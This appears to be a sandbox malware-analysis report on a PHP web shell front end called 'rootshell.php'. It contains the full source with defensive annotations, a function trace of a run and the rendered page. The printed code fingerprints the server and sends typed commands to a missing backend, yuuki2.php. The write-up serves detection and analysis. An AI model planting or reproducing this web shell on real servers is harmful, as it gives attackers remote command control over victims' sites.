PHP Malware Analysis

rootshell.php

md5: 23ac8bfbc10d6d5f7d4acafacaecc9f4


Deobfuscated PHP code (the sample carries no obfuscation: this listing is a pretty-printed copy of the original further down — only whitespace and the echo() formatting differ)

<?php
// Web-shell front end (analysis annotations added; code unchanged).
// This prologue only fingerprints the host: the account the PHP worker runs
// as and the kernel string, both echoed into the page below. No command is
// executed in this file -- the form further down POSTs to the companion
// yuuki2.php, which is not part of this sample.

if (!function_exists('posix_getegid')) {
    // posix extension absent: fall back to script-owner lookups, with errors
    // silenced by @ so the page still renders. Per PHP's definition,
    // get_current_user()/getmyuid() describe the owner of the script file
    // rather than the effective process user, and the group name stays "?".
    $user = @get_current_user();
    $uid = @getmyuid();
    $gid = @getmygid();
    $group = "?";
} else {
    // Effective uid/gid of the PHP process, resolved to names. The recorded
    // sandbox run returned www-data / 33 for both, i.e. the shell runs with
    // web-server privileges; "ROOT SHELL" in the page is aspirational unless
    // the (absent) backend escalates.
    $uid = @posix_getpwuid(posix_geteuid());
    $gid = @posix_getgrgid(posix_getegid());
    $user = $uid['name'];
    $uid = $uid['uid'];
    $group = $gid['name'];
    $gid = $gid['gid'];
}
// Full uname string (kernel release, hostname, build date, arch). In the trace
// this leaked "Linux osboxes 5.15.0-60-generic ... x86_64" to the operator.
$kernel = php_uname();
?>

<!DOCTYPE html>
<html>
	<head>
		<!-- Page title is the Japanese name "Yuuki": a stable string to hunt for in served pages and proxy logs. -->
		<title>ユ ウ キ</title>
		<!-- jQuery fetched from Google's CDN. A browser request to ajax.googleapis.com triggered by a page
		     served from the site's uploads directory is a usable network indicator. -->
		<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
	</head>
<body>
	<!-- Command form. The executor is the sibling file yuuki2.php (relative action, so the same directory)
	     and the command travels in the POST field "yuuki". The jQuery handler below intercepts submit, but
	     without JS this is an ordinary form POST, so the backend can be driven by a plain POST with body
	     yuuki=<cmd> and no visit to this page at all -- hunt access logs for that request shape, not only
	     for rootshell.php itself. -->
	<form method="post" action="yuuki2.php">
		<!-- "ROOT" is a misnomer: the recorded run rendered www-data (uid 33), i.e. web-server privileges,
		     unless the absent backend escalates. -->
		<h2>ROOT SHELL EXECUTOR</h2><br>
		<!-- Host fingerprint rendered on every page load: kernel string, then effective user/group. -->
		<?php 
echo "SYSTEM: {$kernel}<br>";
?>
		<?php 
echo "UID/GID: {$user} ( {$uid} ) | {$group} ( {$gid} )<br><br>";
?>
		<!-- "Kirim" is Indonesian for "send" (as is "hasil" = "result" in the script below): a weak attribution
		     hint. The invalid </input> closing tag is another fingerprint of this author. -->
		<input type='text' name="yuuki" id='yuuki'></input>
		<button id="btn" type="submit">Kirim</button>
	</form>
	<script type="text/javascript">
		// Intercepts the form submit and sends the command over XHR instead of a
		// page navigation, so the operator stays on this page and sees the
		// backend's output appended below.
		$(function(){
			$("form").submit(function(){
				$.ajax({
					url:$(this).attr("action"), // yuuki2.php
					data:$(this).serialize(), // yuuki=<command>
					type:$(this).attr("method"), // POST
					dataType: 'html',
					beforeSend: function() {
						$("input").attr("disabled",true);
						$("button").attr("disabled",true);
					},
					complete:function() {
						$("input").attr("disabled",false);
						$("button").attr("disabled",false);								
					},
					success:function(hasil) {
						// The empty-command check runs only AFTER the request has completed
						// (the alert text suggests it was meant for beforeSend), so a blank
						// submit still produces a POST to yuuki2.php -- every click, even an
						// empty one, leaves a request in the access log.
						var txt = $("#yuuki");
						if(txt.val().trim().length < 1) {
							alert("input cmd beforeSend");
						}else{
							// Backend response ("hasil" = Indonesian for "result") is injected
							// unescaped inside <pre>, so it is rendered as HTML rather than text.
							$("#shellrespon").html('<pre>' + hasil + '</pre>');
							$("form")[0].reset();
							setTimeout(function(){
								$("input").focus();
							},1000);
						}
					}
				})
			return false; // suppress the native form navigation
			});
		});
	</script>
	<!-- Command output lands here. -->
	<div id="shellrespon"></div>
	</body>
</html>

Execution traces (function trace of the sandbox run; the only calls recorded are the capability probe, the posix_* lookups and php_uname() at lines 2–16 of the original file — no command is executed by this file, and the backend yuuki2.php was not exercised)

data/traces/23ac8bfbc10d6d5f7d4acafacaecc9f4_trace-1676245486.912.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:45:12.809811]
1	0	1	0.000166	393528
1	3	0	0.000246	400544	{main}	1		/var/www/html/uploads/rootshell.php	0	0
2	4	0	0.000264	400544	function_exists	0		/var/www/html/uploads/rootshell.php	2	1	'posix_getegid'
2	4	1	0.000280	400584
2	4	R			TRUE
2	5	0	0.000295	400544	posix_geteuid	0		/var/www/html/uploads/rootshell.php	8	0
2	5	1	0.000308	400544
2	5	R			33
2	6	0	0.000321	400544	posix_getpwuid	0		/var/www/html/uploads/rootshell.php	8	1	33
2	6	1	0.000353	401376
2	6	R			['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin']
1		A						/var/www/html/uploads/rootshell.php	8	$uid = ['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin']
2	7	0	0.000400	401344	posix_getegid	0		/var/www/html/uploads/rootshell.php	9	0
2	7	1	0.000413	401344
2	7	R			33
2	8	0	0.000425	401344	posix_getgrgid	0		/var/www/html/uploads/rootshell.php	9	1	33
2	8	1	0.000452	402008
2	8	R			['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33]
1		A						/var/www/html/uploads/rootshell.php	9	$gid = ['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33]
1		A						/var/www/html/uploads/rootshell.php	10	$user = 'www-data'
1		A						/var/www/html/uploads/rootshell.php	11	$uid = 33
1		A						/var/www/html/uploads/rootshell.php	12	$group = 'www-data'
1		A						/var/www/html/uploads/rootshell.php	13	$gid = 33
2	9	0	0.000529	400624	php_uname	0		/var/www/html/uploads/rootshell.php	16	0
2	9	1	0.000543	400736
2	9	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1		A						/var/www/html/uploads/rootshell.php	16	$kernel = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1	3	1	0.000582	400736
			0.000616	314592
TRACE END   [2023-02-12 21:45:12.810295]


Generated HTML code (server-rendered page from the same run: the PHP echoes have become the fingerprint line below — hostname osboxes, kernel 5.15.0-60-generic #66-Ubuntu x86_64, effective user/group www-data 33/33)

<html><head>
		<!-- Rendered output captured from the sandbox run (PHP already evaluated). The DOCTYPE and the
		     invalid </input> tag of the source are gone, presumably because the capture tool re-serialised
		     the DOM; that is an artefact of the capture, not of the sample. -->
		<title>ユ ウ キ</title>
		<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
	</head>
<body>
	<form method="post" action="yuuki2.php">
		<h2>ROOT SHELL EXECUTOR</h2><br>
		<!-- Host fingerprint as served: hostname "osboxes", kernel 5.15.0-60-generic #66-Ubuntu, x86_64;
		     effective user/group www-data (33/33) -- web-server privileges, not root. -->
		SYSTEM: Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64<br>		UID/GID: www-data ( 33 ) | www-data ( 33 )<br><br>		<input type="text" name="yuuki" id="yuuki">
		<button id="btn" type="submit">Kirim</button>
	</form>
	<script type="text/javascript">
		// Same submit interceptor as in the source: command goes to yuuki2.php as POST field "yuuki".
		$(function(){
			$("form").submit(function(){
				$.ajax({
					url:$(this).attr("action"),
					data:$(this).serialize(),
					type:$(this).attr("method"),
					dataType: 'html',
					beforeSend: function() {
						$("input").attr("disabled",true);
						$("button").attr("disabled",true);
					},
					complete:function() {
						$("input").attr("disabled",false);
						$("button").attr("disabled",false);								
					},
					success:function(hasil) {
						// Empty-command check happens after the request completed: a blank submit still POSTs.
						var txt = $("#yuuki");
						if(txt.val().trim().length < 1) {
							alert("input cmd beforeSend");
						}else{
							$("#shellrespon").html('<pre>' + hasil + '</pre>');
							$("form")[0].reset();
							setTimeout(function(){
								$("input").focus();
							},1000);
						}
					}
				})
			return false;
			});
		});
	</script>
	<div id="shellrespon"></div>
	
</body></html>

Original PHP code

<?php // Original sample as uploaded. Comments are end-of-line only so that listing line N still equals the line column in the "Execution traces" section.
if(!function_exists('posix_getegid')) { // line 2: capability probe (trace: TRUE, posix extension present)
	$user = @get_current_user(); // fallback branch, not taken in the recorded run: script-owner lookups with errors silenced
	$uid = @getmyuid();
	$gid = @getmygid();
	$group = "?"; // group name cannot be resolved without posix
} else {
	$uid = @posix_getpwuid(posix_geteuid()); // line 8: effective uid -> passwd entry (trace: 33 / www-data)
	$gid = @posix_getgrgid(posix_getegid()); // line 9: effective gid -> group entry (trace: 33 / www-data)
	$user = $uid['name'];
	$uid = $uid['uid'];
	$group = $gid['name'];
	$gid = $gid['gid'];
}

$kernel = php_uname(); // line 16: full uname string; leaks hostname and kernel build to the operator
?>

<!DOCTYPE html>
<html>
	<head>
		<title>ユ ウ キ</title> <!-- "Yuuki": stable title string to hunt for in served pages -->
		<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> <!-- CDN fetch of jQuery from a page under /uploads/: network indicator -->
	</head>
<body>
	<form method="post" action="yuuki2.php"> <!-- executor is the sibling yuuki2.php (not in this sample); the command is POST field "yuuki" and works as a plain form POST without the JS below -->
		<h2>ROOT SHELL EXECUTOR</h2><br> <!-- misnomer: the rendered run showed www-data (uid 33), i.e. web-server privileges -->
		<?php echo("SYSTEM: $kernel<br>"); ?> <!-- host fingerprint: full uname string -->
		<?php echo("UID/GID: $user ( $uid ) | $group ( $gid )<br><br>"); ?> <!-- effective user/group of the PHP worker -->
		<input type='text' name="yuuki" id='yuuki'></input> <!-- invalid </input> closing tag: another fingerprint -->
		<button id="btn" type="submit">Kirim</button> <!-- "Kirim" = Indonesian "send"; with "hasil" ("result") below, a weak attribution hint -->
	</form>
	<script type="text/javascript">
		$(function(){ // intercept submit and send the command via XHR so the operator stays on the page
			$("form").submit(function(){
				$.ajax({
					url:$(this).attr("action"), // yuuki2.php
					data:$(this).serialize(), // yuuki=<command>
					type:$(this).attr("method"), // POST
					dataType: 'html',
					beforeSend: function() {
						$("input").attr("disabled",true);
						$("button").attr("disabled",true);
					},
					complete:function() {
						$("input").attr("disabled",false);
						$("button").attr("disabled",false);								
					},
					success:function(hasil) {
						var txt = $("#yuuki");
						if(txt.val().trim().length < 1) { // empty check runs only after the request completed: a blank submit still POSTs to yuuki2.php
							alert("input cmd beforeSend"); // the message suggests this check was meant for beforeSend
						}else{
							$("#shellrespon").html('<pre>' + hasil + '</pre>'); // backend output injected unescaped, rendered as HTML
							$("form")[0].reset();
							setTimeout(function(){
								$("input").focus();
							},1000);
						}
					}
				})
			return false; // suppresses the native form navigation
			});
		});
	</script>
	<div id="shellrespon"></div> <!-- command output lands here -->
	</body>
</html>